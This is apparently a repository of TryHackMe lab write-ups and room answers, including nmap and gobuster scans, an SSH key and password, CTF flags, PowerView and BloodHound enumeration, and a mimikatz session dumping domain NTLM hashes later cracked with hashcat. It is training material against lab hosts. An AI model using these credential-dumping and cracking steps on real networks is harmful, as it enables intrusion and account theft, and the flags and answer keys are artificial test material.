6 | 301 - /index.html
7 |
--------------------------------------------------------------------------------
/Overpass/id_rsa:
--------------------------------------------------------------------------------
1 | -----BEGIN RSA PRIVATE KEY-----
2 | Proc-Type: 4,ENCRYPTED
3 | DEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337
4 |
5 | LNu5wQBBz7pKZ3cc4TWlxIUuD/opJi1DVpPa06pwiHHhe8Zjw3/v+xnmtS3O+qiN
6 | JHnLS8oUVR6Smosw4pqLGcP3AwKvrzDWtw2ycO7mNdNszwLp3uto7ENdTIbzvJal
7 | 73/eUN9kYF0ua9rZC6mwoI2iG6sdlNL4ZqsYY7rrvDxeCZJkgzQGzkB9wKgw1ljT
8 | WDyy8qncljugOIf8QrHoo30Gv+dAMfipTSR43FGBZ/Hha4jDykUXP0PvuFyTbVdv
9 | BMXmr3xuKkB6I6k/jLjqWcLrhPWS0qRJ718G/u8cqYX3oJmM0Oo3jgoXYXxewGSZ
10 | AL5bLQFhZJNGoZ+N5nHOll1OBl1tmsUIRwYK7wT/9kvUiL3rhkBURhVIbj2qiHxR
11 | 3KwmS4Dm4AOtoPTIAmVyaKmCWopf6le1+wzZ/UprNCAgeGTlZKX/joruW7ZJuAUf
12 | ABbRLLwFVPMgahrBp6vRfNECSxztbFmXPoVwvWRQ98Z+p8MiOoReb7Jfusy6GvZk
13 | VfW2gpmkAr8yDQynUukoWexPeDHWiSlg1kRJKrQP7GCupvW/r/Yc1RmNTfzT5eeR
14 | OkUOTMqmd3Lj07yELyavlBHrz5FJvzPM3rimRwEsl8GH111D4L5rAKVcusdFcg8P
15 | 9BQukWbzVZHbaQtAGVGy0FKJv1WhA+pjTLqwU+c15WF7ENb3Dm5qdUoSSlPzRjze
16 | eaPG5O4U9Fq0ZaYPkMlyJCzRVp43De4KKkyO5FQ+xSxce3FW0b63+8REgYirOGcZ
17 | 4TBApY+uz34JXe8jElhrKV9xw/7zG2LokKMnljG2YFIApr99nZFVZs1XOFCCkcM8
18 | GFheoT4yFwrXhU1fjQjW/cR0kbhOv7RfV5x7L36x3ZuCfBdlWkt/h2M5nowjcbYn
19 | exxOuOdqdazTjrXOyRNyOtYF9WPLhLRHapBAkXzvNSOERB3TJca8ydbKsyasdCGy
20 | AIPX52bioBlDhg8DmPApR1C1zRYwT1LEFKt7KKAaogbw3G5raSzB54MQpX6WL+wk
21 | 6p7/wOX6WMo1MlkF95M3C7dxPFEspLHfpBxf2qys9MqBsd0rLkXoYR6gpbGbAW58
22 | dPm51MekHD+WeP8oTYGI4PVCS/WF+U90Gty0UmgyI9qfxMVIu1BcmJhzh8gdtT0i
23 | n0Lz5pKY+rLxdUaAA9KVwFsdiXnXjHEE1UwnDqqrvgBuvX6Nux+hfgXi9Bsy68qT
24 | 8HiUKTEsukcv/IYHK1s+Uw/H5AWtJsFmWQs3bw+Y4iw+YLZomXA4E7yxPXyfWm4K
25 | 4FMg3ng0e4/7HRYJSaXLQOKeNwcf/LW5dipO7DmBjVLsC8eyJ8ujeutP/GcA5l6z
26 | ylqilOgj4+yiS813kNTjCJOwKRsXg2jKbnRa8b7dSRz7aDZVLpJnEy9bhn6a7WtS
27 | 49TxToi53ZB14+ougkL4svJyYYIRuQjrUmierXAdmbYF9wimhmLfelrMcofOHRW2
28 | +hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk
29 | 2cWk/Mln7+OhAApAvDBKVM7/LGR9/sVPceEos6HTfBXbmsiV+eoFzUtujtymv8U7
30 | -----END RSA PRIVATE KEY-----
31 |
--------------------------------------------------------------------------------
/Overpass/id_rsa_hash:
--------------------------------------------------------------------------------
1 | id_rsa:$sshng$1$16$9F85D92F34F42626F13A7493AB48F337$1200$2cdbb9c10041cfba4a67771ce135a5c4852e0ffa29262d435693dad3aa708871e17bc663c37feffb19e6b52dcefaa88d2479cb4bca14551e929a8b30e29a8b19c3f70302afaf30d6b70db270eee635d36ccf02e9deeb68ec435d4c86f3bc96a5ef7fde50df64605d2e6bdad90ba9b0a08da21bab1d94d2f866ab1863baebbc3c5e099264833406ce407dc0a830d658d3583cb2f2a9dc963ba03887fc42b1e8a37d06bfe74031f8a94d2478dc518167f1e16b88c3ca45173f43efb85c936d576f04c5e6af7c6e2a407a23a93f8cb8ea59c2eb84f592d2a449ef5f06feef1ca985f7a0998cd0ea378e0a17617c5ec0649900be5b2d0161649346a19f8de671ce965d4e065d6d9ac50847060aef04fff64bd488bdeb8640544615486e3daa887c51dcac264b80e6e003ada0f4c802657268a9825a8a5fea57b5fb0cd9fd4a6b3420207864e564a5ff8e8aee5bb649b8051f0016d12cbc0554f3206a1ac1a7abd17cd1024b1ced6c59973e8570bd6450f7c67ea7c3223a845e6fb25fbaccba1af66455f5b68299a402bf320d0ca752e92859ec4f7831d6892960d644492ab40fec60aea6f5bfaff61cd5198d4dfcd3e5e7913a450e4ccaa67772e3d3bc842f26af9411ebcf9149bf33ccdeb8a647012c97c187d75d43e0be6b00a55cbac745720f0ff4142e9166f35591db690b401951b2d05289bf55a103ea634cbab053e735e5617b10d6f70e6e6a754a124a53f3463cde79a3c6e4ee14f45ab465a60f90c972242cd1569e370dee0a2a4c8ee4543ec52c5c7b7156d1beb7fbc4448188ab386719e13040a58faecf7e095def2312586b295f71c3fef31b62e890a3279631b6605200a6bf7d9d915566cd5738508291c33c18585ea13e32170ad7854d5f8d08d6fdc47491b84ebfb45f579c7b2f7eb1dd9b827c17655a4b7f8763399e8c2371b6277b1c4eb8e76a75acd38eb5cec913723ad605f563cb84b4476a9040917cef352384441dd325c6bcc9d6cab326ac7421b20083d7e766e2a01943860f0398f0294750b5cd16304f52c414ab7b28a01aa206f0dc6e6b692cc1e78310a57e962fec24ea9effc0e5fa58ca35325905f793370bb7713c512ca4b1dfa41c5fdaacacf4ca81b1dd2b2e45e8611ea0a5b19b016e7c74f9b9d4c7a41c3f9678ff284d8188e0f5424bf585f94f741adcb452683223da9fc4c548bb505c98987387c81db53d229f42f3e69298fab2f175468003d295c05b1d8979d78c7104d54c270eaaabbe006ebd7e8dbb1fa17e05e2f41b32ebca93f0789429312cba472ffc86072b5b3e530fc7e405ad26c166590b376f0f98e22c3e60b66899703813bcb13d7c9f5a6e0ae05320de78347b8ffb1d160949a5cb40e29e37071ffcb5b9762a4eec39818d52ec0bc7b227cba37aeb4ffc6700e65eb3ca5aa294e823e3eca24bcd7790d4e30893b0291b178368ca6e745af1bedd491cfb6836552e9267132f5b867e9aed6b52e3d4f14e88b9dd9075e3ea2e8242f8b2f272618211b908eb52689ead701d99b605f708a68662df7a5acc7287ce1d15b6fa12f5907953b49654f198f663663785deb244d25c220083ae62db9fd0b933477b83487606515a24864e6034ba27a624d9c5a4fcc967efe3a1000a40bc304a54ceff2c647dfec54f71e128b3a1d37c15db9ac895f9ea05cd4b6e8edca6bfc53b
2 |
--------------------------------------------------------------------------------
/Overpass/nmap_basic.nmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.80 scan initiated Sun Aug 9 12:30:19 2020 as: nmap -sCVS -A -O -oN nmap_basic.nmap 10.10.108.198
2 | Nmap scan report for 10.10.108.198
3 | Host is up (0.23s latency).
4 | Not shown: 998 closed ports
5 | PORT STATE SERVICE VERSION
6 | 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
7 | | ssh-hostkey:
8 | | 2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)
9 | | 256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)
10 | |_ 256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)
11 | 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
12 | |_http-title: Overpass
13 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
14 | TCP/IP fingerprint:
15 | OS:SCAN(V=7.80%E=4%D=8/9%OT=22%CT=1%CU=31899%PV=Y%DS=2%DC=T%G=Y%TM=5F2F9F35
16 | OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=104%TI=Z%CI=Z%II=I%TS=A)OPS(O
17 | OS:1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11N
18 | OS:W7%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R
19 | OS:=Y%DF=Y%T=40%W=F507%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
20 | OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y
21 | OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
22 | OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=
23 | OS:40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S
24 | OS:)
25 |
26 | Network Distance: 2 hops
27 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
28 |
29 | TRACEROUTE (using port 80/tcp)
30 | HOP RTT ADDRESS
31 | 1 231.50 ms 10.9.0.1
32 | 2 237.43 ms 10.10.108.198
33 |
34 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
35 | # Nmap done at Sun Aug 9 12:31:09 2020 -- 1 IP address (1 host up) scanned in 50.20 seconds
36 |
--------------------------------------------------------------------------------
/Overpass/root.txt:
--------------------------------------------------------------------------------
1 | thm{7f336f8c359dbac18d54fdd64ea753bb}
2 |
--------------------------------------------------------------------------------
/Overpass/ssh_creds.txt:
--------------------------------------------------------------------------------
1 | ssh -i id_rsa James@10.10.108.198 : James13
2 |
--------------------------------------------------------------------------------
/Overpass/todo.txt:
--------------------------------------------------------------------------------
1 | To Do:
2 | > Update Overpass' Encryption, Muirland has been complaining that it's not strong enough
3 | > Write down my password somewhere on a sticky note so that I don't forget it.
4 | Wait, we make a password manager. Why don't I just use that?
5 | > Test Overpass for macOS, it builds fine but I'm not sure it actually works
6 | > Ask Paradox how he got the automated build script working and where the builds go.
7 | They're not updating on the website
8 |
--------------------------------------------------------------------------------
/Overpass/user.txt:
--------------------------------------------------------------------------------
1 | thm{65c1aaf000506e56996822c6281e6bf7}
2 |
--------------------------------------------------------------------------------
/Pentest Questionaire/README.md:
--------------------------------------------------------------------------------
1 | # Pentest Questionaire | https://tryhackme.com/room/pentestquestionaire
2 |
3 | ### [Task 1] Do you know all the answers?
4 |
5 | Basic questions related to penetration testing
6 |
7 | #1 A very popular port scanner used in assessments : `nmap`
8 |
9 | #2 Flag used to load a list of hosts : `-iL`
10 |
11 | #3 Command line vulnerability scanner : `nikto`
12 |
13 | #4 Popular packet analyzer tool having a GUI : `wireshark`
14 |
15 | #5 Online platform to search for exploits. : `exploit-db`
16 |
17 | #6 First phase of the penetration test : `reconnaissance`
18 |
19 | #7 Common penetration testing framework used across multiple platforms : `metasploit`
20 |
21 | #8 A vulnerability assessment framework developed by Tenable : `nessus`
22 |
23 | #9 Automated tool to exploit SQL Injections : `sqlmap`
24 |
25 | #10 Vulnerability which when exploited can send commands to the operating system : `os injection`
26 |
27 | #11 A vulnerability which pops an alert box : `xss`
28 |
29 | #12 You do it horizontally and laterally : `privilege escalation`
30 |
31 | #13 Windows SMB exploit : `eternal blue`
32 |
33 | #14 Vulnerability by which the attacker can include local files (short name) : `lfi`
34 |
35 | #15 Vulnerability by which the attacker can include remote files(short name) : `rfi`
36 |
--------------------------------------------------------------------------------
/PentestQuiz/README.md:
--------------------------------------------------------------------------------
1 | # PentestQuiz | https://tryhackme.com/room/pentestquiz
2 |
3 | ### [Task 1] Getting better at doing "Google Searches"
4 |
5 | Getting better at using "Search Engines" in order to find the right answers in less time is an art. This room is all about quick challenges which most of the n00bs like me already have in mind and don't really require a "Google Search" but for some of the n00bs it is still remained to be learnt!
6 |
7 | #1 Famous port scanner. Can you name it? : ```nmap```
8 |
9 | #2 Famous network packet analyzer. Can you name it? : ```wireshark```
10 |
11 | #3 Best place to find public exploits? : ```exploit-db```
12 |
13 | #4 Best place to find google dorks? : ```ghdb```
14 |
15 | #5 Entering enough data to make the application crash! : ```buffer overflow```
16 |
17 | #6 I am a security bug but not known to anyone yet? : ```0day```
18 |
19 | #7 "Your system has been locked, Pay me the money!" : ```ransomware```
20 |
21 | #8 Group of compromised machines connected to a C&C server! : ```botnet```
22 |
23 | #9 Name the organization that releases TOP 10 Web and Mobile vulnerabilities? : ```owasp```
24 |
25 | #10 Name the famous worm which targeted SCADA environments? : ```stuxnet```
26 |
27 | #11 Art of hiding information in other files! : ```steganography```
28 |
29 | #12 Converting readable data into unreadable format! : ```encryption```
30 |
31 | #13 Name the tool used for reading metadata of images! : ```exiftool```
32 |
33 | #14 Famous Web Application Proxy Tool? : ```burp suite```
34 |
35 | #15 NSA Reverse Engineering Tool? : ```Ghidra```
36 |
37 | #16 Famous Open Source Web Application Proxy Tool? : ```OWASP ZAP```
38 |
--------------------------------------------------------------------------------
/Pickle Rick/README.md:
--------------------------------------------------------------------------------
1 | # Pickle Rick | https://tryhackme.com/room/picklerick
2 |
3 | ### [Task 1] Pickle Rick
4 |
5 | This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.
6 |
7 | #1 What is the first ingredient Rick needs? : `mr. meeseek hair`
8 |
9 | #2 Whats the second ingredient Rick needs? : `1 jerry tear`
10 |
11 | #3 Whats the final ingredient Rick needs? : `fleeb juice`
12 |
--------------------------------------------------------------------------------
/Pickle Rick/gobuster.txt:
--------------------------------------------------------------------------------
1 | ╭─root@kali ~/TryHackMe/Rooms/Pickle_Rick ‹master*›
2 | ╰─# gobuster dir -u 10.10.183.2 -w /usr/share/dirb/wordlists/common.txt
3 | ===============================================================
4 | Gobuster v3.0.1
5 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
6 | ===============================================================
7 | [+] Url: http://10.10.183.2
8 | [+] Threads: 10
9 | [+] Wordlist: /usr/share/dirb/wordlists/common.txt
10 | [+] Status codes: 200,204,301,302,307,401,403
11 | [+] User Agent: gobuster/3.0.1
12 | [+] Timeout: 10s
13 | ===============================================================
14 | 2020/05/25 17:22:02 Starting gobuster
15 | ===============================================================
16 | /.hta (Status: 403)
17 | /.htpasswd (Status: 403)
18 | /.htaccess (Status: 403)
19 | /assets (Status: 301)
20 | /index.html (Status: 200)
21 | /robots.txt (Status: 200)
22 | /server-status (Status: 403)
23 | ===============================================================
24 | 2020/05/25 17:23:46 Finished
25 | ===============================================================
26 |
27 |
--------------------------------------------------------------------------------
/Pickle Rick/login.txt:
--------------------------------------------------------------------------------
1 | http://10.10.183.2/login.php
2 |
3 | http://10.10.183.2/portal.php
4 |
--------------------------------------------------------------------------------
/Pickle Rick/nmap_basic.nmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.80 scan initiated Mon May 25 17:19:46 2020 as: nmap -sCSV -A -O -oN nmap_basic.nmap -Pn 10.10.183.2
2 | Nmap scan report for 10.10.183.2
3 | Host is up (0.19s latency).
4 | Not shown: 998 closed ports
5 | PORT STATE SERVICE VERSION
6 | 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
7 | | ssh-hostkey:
8 | | 2048 2a:05:08:61:53:b5:9e:c6:5f:6c:a1:79:a1:43:51:fb (RSA)
9 | | 256 87:48:b9:16:c9:2b:7f:27:19:33:cd:f4:55:6b:bb:54 (ECDSA)
10 | |_ 256 4b:95:e8:85:15:f5:60:f9:fa:3e:fe:3b:81:f6:81:93 (ED25519)
11 | 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
12 | |_http-server-header: Apache/2.4.18 (Ubuntu)
13 | |_http-title: Rick is sup4r cool
14 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
15 | TCP/IP fingerprint:
16 | OS:SCAN(V=7.80%E=4%D=5/25%OT=22%CT=1%CU=37502%PV=Y%DS=2%DC=T%G=Y%TM=5ECBB12
17 | OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=103%TI=Z%CI=I%II=I%TS=8)SEQ
18 | OS:(SP=103%GCD=1%ISR=103%TI=Z%CI=I%TS=8)SEQ(SP=103%GCD=1%ISR=103%TI=Z%II=I%
19 | OS:TS=8)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5
20 | OS:=M508ST11NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=
21 | OS:68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
22 | OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
23 | OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
24 | OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
25 | OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
26 | OS:%T=40%CD=S)
27 |
28 | Network Distance: 2 hops
29 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
30 |
31 | TRACEROUTE (using port 30951/tcp)
32 | HOP RTT ADDRESS
33 | 1 193.81 ms 10.9.0.1
34 | 2 199.25 ms 10.10.183.2
35 |
36 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
37 | # Nmap done at Mon May 25 17:21:05 2020 -- 1 IP address (1 host up) scanned in 79.26 seconds
38 |
--------------------------------------------------------------------------------
/Pickle Rick/robot.txt:
--------------------------------------------------------------------------------
1 | Wubbalubbadubdub
2 |
--------------------------------------------------------------------------------
/Pickle Rick/username.txt:
--------------------------------------------------------------------------------
1 | Note to self, remember username!
2 |
3 | Username: R1ckRul3s
4 |
--------------------------------------------------------------------------------
/Post-Exploitation-Basics/README.md:
--------------------------------------------------------------------------------
1 | # Post-Exploitation Basics | https://tryhackme.com/room/postexploit
2 |
3 | `ssh Administrator@10.10.159.61` : `P@$$W0rd`
4 |
5 | ### [Task 2] Enumeration w/ [Powerview](https://github.com/thehackingsage/TryHackMe/blob/master/Post-Exploitation-Basics/powerview/powerview.txt)
6 |
7 | #1 What is the shared folder that is not set by default? : `Share`
8 |
9 | #2 What operating system is running inside of the network besides Windows Server 2019? : `Windows 10 Enterprise Evaluation`
10 |
11 | #3 I've hidden a flag inside of the users find it : `POST{P0W3RV13W_FTW}`
12 |
13 | ### [Task 3] Enumeration w/ [Bloodhound](https://github.com/thehackingsage/TryHackMe/blob/master/Post-Exploitation-Basics/bloodhound/bloodhound.txt)
14 |
15 | #1 What service is also a domain admin : `SQLSERVICE`
16 |
17 | 
18 |
19 | #2 What two users are Kerberoastable? : `SQLSERVICE, KRBTGT`
20 |
21 | 
22 |
23 | ### [Task 4] Dumping hashes w/ [mimikatz](https://github.com/thehackingsage/TryHackMe/blob/master/Post-Exploitation-Basics/mimikatz/mimikatz.txt)
24 |
25 | #1 what is the Machine1 Password? : [`Password1`](https://github.com/thehackingsage/TryHackMe/blob/master/Post-Exploitation-Basics/mimikatz/hashcat.txt)
26 |
27 | #2 What is the Machine2 Hash? : `c39f2beb3d2ec06a62cb887fb391dee0`
28 |
29 | ### [Task 6] Enumeration w/ Server Manager
30 |
31 | 
32 |
33 | 
34 |
35 | #1 What tool allows to view the event logs? : `Event Viewer`
36 |
37 | 
38 |
39 | #2 What is the SQL Service password : `MYpassword123#`
40 |
41 | 
42 |
--------------------------------------------------------------------------------
/Post-Exploitation-Basics/bloodhound/bloodhound.txt:
--------------------------------------------------------------------------------
1 | PS C:\Users\Administrator> . .\Downloads\SharpHound.ps1
2 | PS C:\Users\Administrator> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
3 | -----------------------------------------------
4 | Initializing SharpHound at 1:19 AM on 8/13/2020
5 | -----------------------------------------------
6 |
7 | Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
8 |
9 | [+] Creating Schema map for domain CONTROLLER.LOCAL using path CN=Schema,CN=Configuration,DC=CONTROLLER,DC=LOCAL
10 | PS C:\Users\Administrator> [+] Cache File not Found: 0 Objects in cache
11 |
12 | [+] Pre-populating Domain Controller SIDS
13 | Status: 0 objects finished (+0) -- Using 94 MB RAM
14 | Status: 66 objects finished (+66 33)/s -- Using 99 MB RAM
15 | Enumeration finished in 00:00:02.5366752
16 | Compressing data to C:\Users\Administrator\20200813011952_loot.zip
17 | You can upload this file directly to the UI
18 |
19 | SharpHound Enumeration Completed at 1:19 AM on 8/13/2020! Happy Graphing!
20 |
--------------------------------------------------------------------------------
/Post-Exploitation-Basics/bloodhound/kerberoastable-users.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/bloodhound/kerberoastable-users.png
--------------------------------------------------------------------------------
/Post-Exploitation-Basics/bloodhound/loot.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/bloodhound/loot.zip
--------------------------------------------------------------------------------
/Post-Exploitation-Basics/bloodhound/service.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/bloodhound/service.png
--------------------------------------------------------------------------------
/Post-Exploitation-Basics/mimikatz/hashcat.txt:
--------------------------------------------------------------------------------
1 | hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt
2 |
3 | 64f12cddaa88057e06a81b54e73b949b = Password1
4 |
--------------------------------------------------------------------------------
/Post-Exploitation-Basics/mimikatz/mimikatz.txt:
--------------------------------------------------------------------------------
1 | Microsoft Windows [Version 10.0.17763.737]
2 | (c) 2018 Microsoft Corporation. All rights reserved.
3 |
4 | controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>cd Downloads && mimikatz.exe
5 |
6 | .#####. mimikatz 2.2.0 (x64) #18362 May 2 2020 16:23:51
7 | .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
8 | ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
9 | ## \ / ## > http://blog.gentilkiwi.com/mimikatz
10 | '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
11 | '#####' > http://pingcastle.com / http://mysmartlogon.com ***/
12 |
13 | mimikatz # privilege::debug
14 | Privilege '20' OK
15 |
16 | mimikatz # lsadump::lsa /patch
17 | Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
18 |
19 | RID : 000001f4 (500)
20 | User : Administrator
21 | LM :
22 | NTLM : 2777b7fec870e04dda00cd7260f7bee6
23 |
24 | RID : 000001f5 (501)
25 | User : Guest
26 | LM :
27 | NTLM :
28 |
29 | RID : 000001f6 (502)
30 | User : krbtgt
31 | LM :
32 | NTLM : 5508500012cc005cf7082a9a89ebdfdf
33 |
34 | RID : 0000044f (1103)
35 | User : Machine1
36 | LM :
37 | NTLM : 64f12cddaa88057e06a81b54e73b949b
38 |
39 | RID : 00000451 (1105)
40 | User : Admin2
41 | LM :
42 | NTLM : 2b576acbe6bcfda7294d6bd18041b8fe
43 |
44 | RID : 00000452 (1106)
45 | User : Machine2
46 | LM :
47 | NTLM : c39f2beb3d2ec06a62cb887fb391dee0
48 |
49 | RID : 00000453 (1107)
50 | User : SQLService
51 | LM :
52 | NTLM : f4ab68f27303bcb4024650d8fc5f973a
53 |
54 | RID : 00000454 (1108)
55 | User : POST
56 | LM :
57 | NTLM : c4b0e1b10c7ce2c4723b4e2407ef81a2
58 |
59 | RID : 00000457 (1111)
60 | User : sshd
61 | LM :
62 | NTLM : bb068638512ac1118ce7f78e92f49792
63 |
64 | RID : 000003e8 (1000)
65 | User : DOMAIN-CONTROLL$
66 | LM :
67 | NTLM : 271a221ceb6f5879ee15143b56c96625
68 |
69 | RID : 00000455 (1109)
70 | User : DESKTOP-2$
71 | LM :
72 | NTLM : 3c2d4759eb9884d7a935fe71a8e0f54c
73 |
74 | RID : 00000456 (1110)
75 | User : DESKTOP-1$
76 | LM :
77 | NTLM : 7d33346eeb11a4f12a6c201faaa0d89a
78 |
79 | mimikatz #
80 |
--------------------------------------------------------------------------------
/Post-Exploitation-Basics/powerview/flag.txt:
--------------------------------------------------------------------------------
1 | POST{P0W3RV13W_FTW}
2 |
--------------------------------------------------------------------------------
/Post-Exploitation-Basics/powerview/powerview.txt:
--------------------------------------------------------------------------------
1 | (c) 2018 Microsoft Corporation. All rights reserved.
2 |
3 | controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>powershell -ep bypass
4 |
5 | Windows PowerShell
6 |
7 | Copyright (C) Microsoft Corporation. All rights reserved.
8 |
9 | PS C:\Users\Administrator> . .\Downloads\PowerView.ps1
10 |
11 | PS C:\Users\Administrator> Get-NetUser | select cn
12 |
13 | cn
14 | --
15 | Administrator
16 | Guest
17 | krbtgt
18 | Machine-1
19 | Admin2
20 | Machine-2
21 | SQL Service
22 | POST{P0W3RV13W_FTW}
23 | sshd
24 |
25 |
26 | PS C:\Users\Administrator> Get-NetGroup -GroupName *admin*
27 |
28 | Administrators
29 | Hyper-V Administrators
30 | Storage Replica Administrators
31 | Schema Admins
32 | Enterprise Admins
33 | Domain Admins
34 | Key Admins
35 | Enterprise Key Admins
36 | DnsAdmins
37 |
38 |
39 | PS C:\Users\Administrator> get-netshare
40 |
41 | shi1_netname shi1_type shi1_remark
42 | ------------ --------- -----------
43 | ADMIN$ 2147483648 Remote Admin
44 | C$ 2147483648 Default share
45 | IPC$ 2147483651 Remote IPC
46 | NETLOGON 0 Logon server share
47 | Share 0
48 | SYSVOL 0 Logon server share
49 |
--------------------------------------------------------------------------------
/Post-Exploitation-Basics/server-manager/dashbord.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/server-manager/dashbord.png
--------------------------------------------------------------------------------
/Post-Exploitation-Basics/server-manager/event-logs.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/server-manager/event-logs.png
--------------------------------------------------------------------------------
/Post-Exploitation-Basics/server-manager/login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/server-manager/login.png
--------------------------------------------------------------------------------
/Post-Exploitation-Basics/server-manager/rdesktop.txt:
--------------------------------------------------------------------------------
1 | rdesktop -u SG 10.10.92.133
2 |
--------------------------------------------------------------------------------
/Post-Exploitation-Basics/server-manager/sql-service-password.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/server-manager/sql-service-password.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Try Hack Me | https://tryhackme.com/p/mr.sage
2 |
3 | 
4 |
--------------------------------------------------------------------------------
/RP Metasploit/README.md:
--------------------------------------------------------------------------------
1 | # RP : Metasploit | https://tryhackme.com/room/rpmetasploit
2 |
3 | ### [Task 2] Initializing...
4 |
5 | #3 We can start the Metasploit console on the command line without showing the banner or any startup information as well. What switch do we add to msfconsole to start it without showing this information? This will include the '-' : `-q`
6 |
7 | #6 Cool! We've connected to the database, which type of database does Metasploit 5 use? : `postgresql`
8 |
9 | ### [Task 3] Rock 'em to the Core [Commands]
10 |
11 | #2 The help menu has a very short one-character alias, what is it? : `?`
12 |
13 | #3 Finding various modules we have at our disposal within Metasploit is one of the most common commands we will leverage in the framework. What is the base command we use for searching? : `search`
14 |
15 | #4 Once we've found the module we want to leverage, what command we use to select it as the active module? : `use`
16 |
17 | #5 How about if we want to view information about either a specific module or just the active one we have selected? : `info`
18 |
19 | #6 Metasploit has a built-in netcat-like function where we can make a quick connection with a host simply to verify that we can 'talk' to it. What command is this? : `connect`
20 |
21 | #7 Entirely one of the commands purely utilized for fun, what command displays the motd/ascii art we see when we start msfconsole (without -q flag)? : `banner`
22 |
23 | #8 We'll revisit these next two commands shortly, however, they're two of the most used commands within Metasploit. First, what command do we use to change the value of a variable? : `set`
24 |
25 | #9 Metasploit supports the use of global variables, something which is incredibly useful when you're specifically focusing on a single box. What command changes the value of a variable globally? : `setg`
26 |
27 | #10 Now that we've learned about to change the value of variables, how do we view them? There are technically several answers to this question, however, I'm looking for a specific three-letter command which is used to view the value of single variables. : `get`
28 |
